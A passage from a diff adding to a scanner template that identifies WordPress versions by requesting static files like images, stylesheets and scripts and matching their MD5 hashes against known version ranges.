"(\"30afc4c6904a1bb43ca590182fa82c99\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8cefea482bbe5aecc797bd1201182c91\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/w-logo-blue.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"fd5b4eb05706a2f05f707fe077ae1030\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4990a6a10bcbccdbbaa0a7103f065344\" == 
md5(body))" + - type: dsl + name: 5.4.1 + dsl: + - "(\"000bf649cc8f6bf27cfb04d1bcdcd3c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/loading.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"2d5b92b61674c850bff00cecaf0864ec\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"fb72313c9cd2f6f42123ef9213837924\" == md5(body))" + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"9a8269421303631316be4ab5e34870e1\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a20488e97ed28a25eb847938a297ffb4\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"6917a796d74c08a8c0b993e2acd68985\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"876d276e7d54dd2d568de865c3e0f60a\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"4085d79caf783e639794adbab5d6c2a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/sort-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"186e51267fca5d20b230c72d9a8983ee\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"3109e5b77fb7f442c17fb0a10715a657\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.8.35 + dsl: + - "(\"e07d0440c2d59e252b64f10bd293f897\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"45592749900dae6565848a310a0c0fbd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8f91b441c3ac6bec3abc62d18276466a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f59fa2d103e13985d7e18df4c9d06c85\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"00f8eb37d4873aff33559be1ab3a5da0\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b03476d23e09e01f7be81edcb0327fce\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b386228e88380ff75bcf293d432db6a4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - 
"(\"94d8926ae846f335cf811cbf61635298\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1be4557714895c25adba8260adcc05ab\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"55e763de4264920be68a1f998fccc720\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"0f784f57881b720d887823b519fa143f\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"fa1ab1ee7f929d54403190cb29e496fe\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"b84abcd93646dedd34ab5c0fe7ffd284\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"6a350c561385084ca1b185cd812e7f43\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"d4252f4e714f52e5670c05fbc02b5ced\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview.min.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"69bfc88e3f3d46f116da818588e1c958\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"f97c81542e5a01d1d1fafc83d3e919e4\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"76bf4def75558cdf6dcfc19e594b77a6\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"531c56155495680f35003643b5cfaa48\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8774579bd6b94878424d338bb07b743d\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"82273ee41dee175c7defaaadad83da06\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"7a6724d220d95c58e9cad4439440e987\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview-rtl.min.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"cccb91a79bd1a1b14bdad769d3b04ff2\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"c48fdf5861c04e2024cfdd46da5955ee\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"f2c05a610b3d909c6aa8d4babd48537b\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - 
"(\"26b12a98fb6b6e4b9791e35fa9df232b\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9d5d67784b768a01eb2b9dd0ad92df39\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"a5a052c8869b9f302405b069b1aa0613\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"f77ee2e90b397bdc85b94fef4ec3c339\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"0ab30f10403b04fae67be3820704c05f\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"ff2b06049dc65d95cd7f18988e6e7dd1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"98c2c3a588daf7cde40f226ac67f2ddb\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"27b10ba4bbd6ab877d3aefa45d9bb779\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5fdb191ad80e4816383046e16098b1f1\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"90dc80956cdac4efdc00e1fa2f1fd826\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"4c4992759e2e9171987ee83c2b4ff8f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"69119370ea789693d6c810f34364c99c\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"f70177af61c65044aaa0a18594338f3c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"ba1ad4bc43e2aa43661307a5599b48c5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ae6578b0e82b02df40c157015c7d3683\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"40c7819542c846fc69a480e2bb87f722\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"7399d7a8a9a716303de9628083a61070\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"d47998057f5f31758add87f462076fe2\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - 
"(\"a7a67d1de1a0330fc7769d384a6564cc\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ecfba7b663d82c1fbecfbcc86db4a649\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.2 + dsl: + - "(\"0e31542957a5ced3fb021a641359a902\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"d2923af1854be05bcf49775c89aa6798\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"70b1fc34e77c76bb92be0c02b229b467\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"ae983b9a7a8d0ad43cad5ef5ad85c1ab\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0076bd51c8efaca78a6455c512e8be05\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"8808a137a054725f8fc730e4bbb58b89\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"38740af5358c42ca3770804aca9b1e2d\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"ed15397c76c49fb9518bdb1b912a55ef\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b778c332bab095f15db744c1795a430e\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"5f222b295e30dd62dfe160985b95f495\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"fc97c80e6a890c6b30837a2b7ccea115\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"a17103ce4c70991f0751a1df272eac49\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"2a32942db87ad5f97fd3cfe5b3317609\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"591f9bbbaefec332c4b00d6d7d25a1c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/wp-small.png" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"ac8d6980faf95aa199492d5f3abdfa82\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/wordpress.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"9d2220fca1ac66355fb7ca7916d5a2e7\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/b2-img/url.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"44eea3b2c6b0e045292ddaa8b828b3a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/bgbookmarklet1.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"3a09dfc3d0fe15f0690bfccb8e85830e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/bgbookmarklet.png" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"f0e41f1bed9a4c21d1dc545e5d3c158a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/bgbookmarklet3.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"686f31ec275bfa7652a4f290e9a77307\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/email.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e53e211ef830dd087508e4967613d8cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/xml.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e67c90a18c89f8d05125c045b2978dcf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/wpminilogo.png" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"2f58b9a016e6da1012819decfc6dd331\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_question.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_neutral.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_sad.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_biggrin.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/b2-img/smilies/icon_surprised.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_wink.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_cool.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_confused.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_redface.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_cry.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_smile.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_evil.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_mrgreen.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_idea.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_razz.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/b2-img/smilies/icon_lol.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_rolleyes.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_exclaim.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_mad.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_twisted.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_arrow.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_eek.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/blank.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"6d22e4f2d2057c6e8d6fab098e76e80f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-2.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"de5cf34823da2cfed273b9c8cf52248a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/star.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"888920359f8931eb72582d0c352722ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-3.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"a5b70a894f90cf8574284b7296f7661c\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-links/links-images/rating-9.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"4eda31d251821e5d6e5ed9cad411434f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-0.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"745de19d2c08e95dfa07113d16d77ace\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-6.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"7320c171d53bc359b0cd7ae1b53774d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-7.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"a8cbf1fe3a498f4a20abd6768a46de7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-8.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"c5cb7ee14792e1658bc0663014d37f65\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-4.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"aa064cadd0f43c0352607dad68bc5af2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-1.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"bdc9ea72a16082ff4d0ac730f090e0d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-5.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"42698681e4d8734c2932c2415b94b713\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-include/xmlrpcs.inc" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"0d59ddac24244f58002965f254602d32\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-include/xmlrpc.inc" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"14524c5d7f9f72394e04512d9941bc50\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/layout2b.css" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"baec6b6ccbf71d8dced9f1bf67c751e1\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/readme.txt" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"d6a0bc72fe7314bf9e5a823476464f35\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/b2quicktags.js" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e7df5ea2abd8e8ff1cdc33c890f8b158\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/b2menutop.txt" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"75c44385f76be11e237f16e6197cf5f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/b2.css" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"3c14414953b50843020e9ffdab7d8f9b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/example.htaccess" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"194e5ef5e9fcfffb5ad172c3c6338ce4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/print.css" + matchers: + - type: dsl + name: 0.71-gold - 1.2.2 + dsl: + - "(\"31303216dd399348d4fe45e4f775e761\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"fabceb537401cb07c705e7a7203f3cf6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/widgets-rtl.css" + matchers: + - type: dsl + name: 2.2.3 + dsl: + - "(\"616cfd535e185eab0a2e2035d2367d70\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.2 + dsl: + - "(\"6870131d25b60c372f372e0eb1f46a4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/install-rtl.css" + matchers: + - type: dsl + name: 2.2.3 + dsl: + - "(\"77b94469c0536617ccf3f128e82629e7\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.2 + dsl: + - "(\"8cbe81cffd55d03cbeccf0fe7afea257\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/widgets.css" + matchers: + - type: dsl + name: 2.2.1 - 2.2.3 + dsl: + - "(\"d751fab844dac51f11dfcde4bcd951fe\" == md5(body))" + - type: dsl + name: 2.2 + dsl: + - "(\"2ab4e0bc7e978c7eecaf6d54867370a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax.js" + matchers: + - type: dsl + name: 2.2.1 - 
2.5.1 + dsl: + - "(\"c65fa296a21bab7aaac66f145ac45155\" == md5(body))" + - type: dsl + name: 2.2 + dsl: + - "(\"c5dbce0c3232c477033e0ce486c62755\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-ie-rtl.css" + matchers: + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"0270238fcfc6b6195b11227c1671b8e0\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"8a06d53fca440005e815e5654b152700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/forms.js" + matchers: + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"06f1e99c547915248f28eb8e0a59a316\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"5248ccc0d3a9bcdd0dc8b2faf129db2d\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"cebab0a1616272ef63c4e98ae005a3f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/wp-admin.dev.css" + matchers: + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"59f4b6b1fe9d9d775f531772284fedda\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"59bd3e53cbab943706702e18622f517d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-gears.js" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0f72be7cae8c998be51a21216abca01d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"596473e965c68ad64c8c20b5c56e0da3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1335ebf3c647fb07e0b9e427e83ed435\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"53683d6a5dd7d32ebb703fce7b894620\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"e08d34a883c155084296c35872e0b382\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b2ee1f0928a71f8621e17f702da4bf15\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b3772e896c38a69013ebafca1da7a49a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - 
"(\"19dac48c3c808feb3a3f5e6eb4af11da\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"2c86c9314921ac6acd69e480f092eb65\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"1d469fa64b12915edd13d68148453c72\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"049a5595657f110b9cbbb31cad73b094\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1a7408da79a9bae4ef8e741f295f9f21\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"4d510f0a9aa612e1e196e5620040a426\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor-rtl.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"afad874ed34bfb50e3fb57cc20b93d56\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.9.2 + dsl: + - "(\"67937f3a3e8e4b9eeaa5fe15c1cce63b\" == md5(body))" + - type: dsl + name: 2.7 - 2.8 + dsl: + - "(\"2e4be8eba21d8e05e18d9fc03c9a1f6e\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"1cd1b9f3b3477cc40cb2a4b3af29cc0c\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"a3cde5875a5257cc8c910d1a2838e801\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"0ef754d669368b5736ddcadb366d4c05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"541419d7c0122d14d9fd1da3142a25c0\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5dc8ab63a6a5936550b79bc5287eb229\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8551c02b4c8c6d91355ff61745f6c164\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"5cee5b5a5cb2bfdc471296741568da9b\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"afebbd5ba8b14fdd0397021244066daa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor.dev.css" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"8f375efc2f2a3f703d6ba284f99830d4\" == md5(body))" + - type: dsl + name: 3.4 
- 3.4.1 + dsl: + - "(\"4ff306aa0f0331e56473dbeef3fbcd51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"75bd0d965758c849bd27173d7aec1923\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"cedf550582b93e7cf4779203a8a99f2d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"7958066469b0a567962a6355d9c5f817\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"db66fc020cd91632a8689214cf532a23\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"6e708a6fb002e7e2b46f0b6ca081ab3d\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"49f263599016025d39f84c17bd6287c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-lists.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"bb69091155683715d2902019693ceeac\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"91723a5f56f555a02bcf3e169694f77a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c48d5b52db182adec677f77dd6771b53\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"5afcff15a6ae5783bbc49efb8e556eb9\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"3307a4b7fce5e39e3c13f0e3478cbb5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview.dev.js" + matchers: + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"16e10c6310bd62bb63876f0094592ef4\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"7ea457381aefb6d20836d3af804af618\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-profile.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9a55eb19b2ba406d0c446494f5082362\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"cea2eb0573610ab89618ec3e1104fe87\" == 
